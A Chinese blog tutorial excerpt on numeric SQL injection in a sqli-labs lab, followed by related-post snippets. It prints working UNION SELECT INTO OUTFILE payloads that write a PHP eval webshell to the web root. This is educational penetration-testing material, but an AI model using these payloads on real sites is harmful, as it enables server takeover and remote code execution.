【漏洞挖掘】——97、数字型注入深入刨析(中)

最新推荐文章于 2024-06-21 15:38:06 发布
最新推荐文章于 2024-06-21 15:38:06 发布
阅读量132 收藏
点赞数 3
分类专栏: 【WEB渗透】 文章标签: SQL注入 手工注入 渗透测试 信息安全 Mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Fly_hps/article/details/139830238
版权
【WEB渗透】 专栏收录该内容
103 篇文章 1 订阅 ¥29.90 ¥99.00
订阅专栏
注入写shell
写shell条件
  • 知道web物理路径
  • 单引号未被过滤
  • 具有写权限(一般为root)
写shell语句
  • select ... into outfile...
http://192.168.204.160:83/Less-2/?id=-1 union select 1,2,'<?php eval($_POST[cmd]); ?>' into outfile '/var/www/html/shell.php' --+

我这边似乎是没有权限,之后去服务器端修改了一下,成功写入:

http://192.168.204.160:83/Less-2/?id=-1 union select 1,2,'<?php eval($_POST[cmd]); ?>' into outfile '/var/www/html/Less-2/shell.php' --+

随后成功远程连接

了解本专栏 订阅专栏 解锁全文
FLy_鹏程万里
关注
  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
漏洞挖掘】——96、数字型注入深入刨析(上)
Fly_鹏程万里
06-20 81
MySQL数字型注入(Numeric Injection)是一种针对数据库查询的安全漏洞攻击,利用了对数字类型的输入验证不足或不正确处理的情况,攻击者利用这个漏洞注入恶意的数字值以绕过应用程序的输入验证并执行未经授权的查询操作或获取敏感数据,而我们所谓的数字型注入其实是指可控参数为整型整型(例如:年龄、id序列号、页码等)且存在注入漏洞,由于参数是整型,所有该类型的注入漏洞被称之为"数字型"注入
漏洞挖掘】——99、字符型注入深入刨析(上)
Fly_鹏程万里
06-20 21
在数据库安全字符型注入(String-based Injection)是一种常见的安全漏洞攻击类型,针对的是处理字符型数据时的输入验证不足或不正确处理,攻击者利用这个漏洞通过恶意注入特殊字符或字符串来绕过应用程序的输入验证,执行未经授权的数据库查询或获取敏感数据,由于可控参数为字符型,所以我们也常常将此类型的注入漏洞被称之为"字符型"注入
漏洞挖掘】——98、数字型注入深入刨析(下)
Fly_鹏程万里
06-20 16
本篇文章我们主要介绍了数字型注入漏洞的检测方式、手工注入方式、注入漏洞的深入利用(写入webshell、读取文件等操作),同时也介绍了SQLMap在SQL注入漏洞的利用方式~这里根据注入的对象选择即可,这里是Mysql+PHP+Apache搭建的测试环境,所以选择PHP——>4。如果发现设置路径之后无法返回shell,那么说明没有写权限~如果要进行后渗透测试也可以反弹shell到msf或者CS
漏洞挖掘】——103、Blind注入类型深入刨析()
Fly_鹏程万里
06-21 350
sleep():用于延迟IF(Condition,A,B):当Condition为TRUE时,返回A;当Condition为FALSE时,返回BBENCHMARK(count,expr):重复count次执行表达式expr,它可以用于计时MySQL处理表达式有多快,结果值总是0。
漏洞挖掘】——105、POST注入深入剖析
Fly_鹏程万里
06-21 16
POST是一种数据提交方式,它主要是指数据从客户端提交到服务器端,例如:我们常常使用的用户登录模块、网站的留言板模块等,在这些功能模块我们提交的数据都是以POST的方式提交的服务器后再由服务器端进行验证,如果以POST提交的参数存在注入点,那么将这种注入称之为"POST"注入
漏洞挖掘】——83、API接口安全问题刨析
Fly_鹏程万里
06-12 23
在HW期间的目标信息收集阶段,我们时而会遇到WSDL(Web Services Description Language)的XML格式文件,其定义了Web服务的接口、操作、消息格式和协议细节,在WSDL文件很多时候都会指定服务的端口类型(Port Type)和绑定(Binding),绑定定义了如何使用 SOAP协议进行通信以及消息的格式和传输细节,而这很多时候会被对此不是很了解的红队队员会直接进行忽略,而部分对此有了解红队的会对接口进行Fuzzingc测试,试图找寻诸如命令执行、SQL诸如等漏洞,力争获取
sql注入详解
热门推荐
good good study
05-05 19万+
SQL注入(SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句后,被当作SQL语句的一部分执行。 从而导致数据库受损(被脱库、被删除、甚至整个服务器权限陷)。 即:注入产生的原因是后台服务器接收相关参数未经过滤直接带入数据库查询...
漏洞挖掘】——27、XSS漏洞攻防案例
Fly_鹏程万里
03-10 8349
本实验在搜索功能包含一个简单的跨站点脚本漏洞,为了解决这个实验,您必须执行一个调用alert函数的跨站点脚本攻击本实验在搜索博客功能包含一个反射型的跨站点脚本漏洞,其尖括号是HTML编码的,为了解决这个实验,你需要执行一个跨站点脚本攻击,注入一个属性并调用alert函数本实验包含一个反射性跨站点脚本漏洞,该漏洞存在于编码了尖括号的搜索查询跟踪功能,反射发生在JavaScript字符串内部,为了解决这个实验,你需要执行一个跨站点脚本攻击,它突破JavaScript字符串并调用alert函数。
常见web漏洞——SQL注入
m0_55854679的博客
04-18 2560
pikachu漏洞练习平台(SQL—Inject) 概述 SQL注入漏洞主要形成的原因是在数据交互,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句后,被当作SQL语句的一部分执行。 从而导致数据库受损(被脱裤、被删除、甚至整个服务器权限沦陷)。 在构建代码时,一般会从如下几个方面的策略来防止SQL注入漏洞: 1.对传进SQL语句里面的变量进行过滤,不允许危险字符传入; 2.使用参数化(Parameterized Query 或 Parameterized Statem
电源技术的PMBus——数字电源开放标准协议
10-20
近年来,许多相关的因素导致对数字电源管理的需求急剧上升。许多板卡设计人员已经转向开发间总线电源结构,通过使用多个单板DC/DC转换器来产生不同硅器件所需要的多样化的电源要求。这导致一个很明显的结果就是在...
三谈“数字孪生”——更深入的研究与应用
01-27
实际上,自从有了诸如CAD等数字化的“创作(authoring)”手段,就已经有了数字孪生的源头,有了CAE仿真手段,就让数字虚体和物理实体走得更近,有了系统仿真,可以让数字虚体更像物理实体,直至有了比较系统的数字...
sql注入数字型注入
08-02
SQL 注入数字型注入是一种常见的 Web 应用安全漏洞,攻击者可以通过构造恶意输入来inject恶意 SQL 语句,访问或修改数据库的敏感信息。本文将详细介绍数字型注入的概念、原理、检测方法和防御措施。 一、数字型...
实例006——实现数字金额的文大写转换.zip
01-14
实例006——实现数字金额的文大写转换 实例006——实现数字金额的文大写转换 实例006——实现数字金额的文大写转换
正弦波信号发生器设计教程.docx
06-22
正弦波信号发生器设计 本教程详细介绍了如何设计和实现一个正弦波信号发生器,涵盖了硬件实现和软件实现两种方法。通过硬件方法,我们使用函数发生器和示波器生成和观察正弦波信号;通过软件方法,我们使用Python和MATLAB生成和绘制正弦波信号。此外,教程还提供了一些扩展功能,以提高信号发生器的实用性和灵活性。无论您是电子工程师还是编程爱好者,都能从本教程获得实用的技能和知识。
芯晞微 CSM2042 40V,低辍学,250 mA线性调节器 深圳市可芯电子有限公司.pdf
06-22
芯晞微 CSM2042 40V,低辍学,250 mA线性调节器 深圳市可芯电子有限公司.pdf
gaodetianqi.txt
06-22
gaodetianqi.txt
编程项目实战:基于JAVA的文件压缩与解压缩实践(源代码+论文)
06-22
文件的压缩与解压缩,要能方便地进行,要完成的功能包括压缩功能,解压缩功能,选择文件路径,选择操作方案,选择新文件保存路径。此程序还要在压缩成功后显示被压缩文件的大小,并对非法操作给出提示。 用户可以选择文件进行压缩或解压缩操作,并选择生成保存路径,默认的保存路径为原文件目录,压缩的生成文件以原文件加.gzip后缀命名,在解压缩操作,若输入文件不是gzip格式的压缩文件,则提示gzip文件格式不对。 程序的基本设计原则有:方便性原则、功能实用性原则和开放性原则等。程序设计时采用较好的压缩技术,能保证文件压缩的压缩比和可恢复性,确保程序有较长的生命周期。 本程序的总体目标是实现文件压缩与解压缩的便捷操作,因此需要有便捷的操作界面。 2.2使用的算法理论 2.2.1LZ77算法简介 这一算法是由Jacob Ziv和Abraham Lempel于 1977 年提出,所以命名为LZ77。这种算法模型也被称为“滑动字典”模型或“滑动窗口”模型。 压缩的模型如图1:     图1 压缩的LZ77算法模型图 在最远匹配位置和当前处理位置之间是可以用来查找匹配的“字典”区域,随着压缩的进行,“
TPS2HB35 Altium Designer PCB库
最新发布
06-22
TPS2HB35 AltiumDesigner 原理图库
如何判断字符型和数字型注入
01-03
判断字符型和数字型注入的方法如下: 1. 字符型注入判断: - 在注入点处输入一个单引号('),如果页面报错或者显示异常,那么很可能存在字符型注入漏洞。 - 在注入点处输入一个闭合的单引号('),如果页面正常显示,那么很可能存在字符型注入漏洞。 - 在注入点处输入一个闭合的单引号(')加上一个错误的单引号('),如果页面报错或者显示异常,那么很可能存在字符型注入漏洞。 2. 数字型注入判断: - 在注入点处输入一个数字,如果页面正常显示,那么很可能存在数字型注入漏洞。 - 在注入点处输入一个数字加上一个错误的数字,如果页面报错或者显示异常,那么很可能存在数字型注入漏洞。 需要注意的是,以上方法只是初步判断是否存在注入漏洞,具体的注入攻击还需要进一步的测试和分析。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

FLy_鹏程万里

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值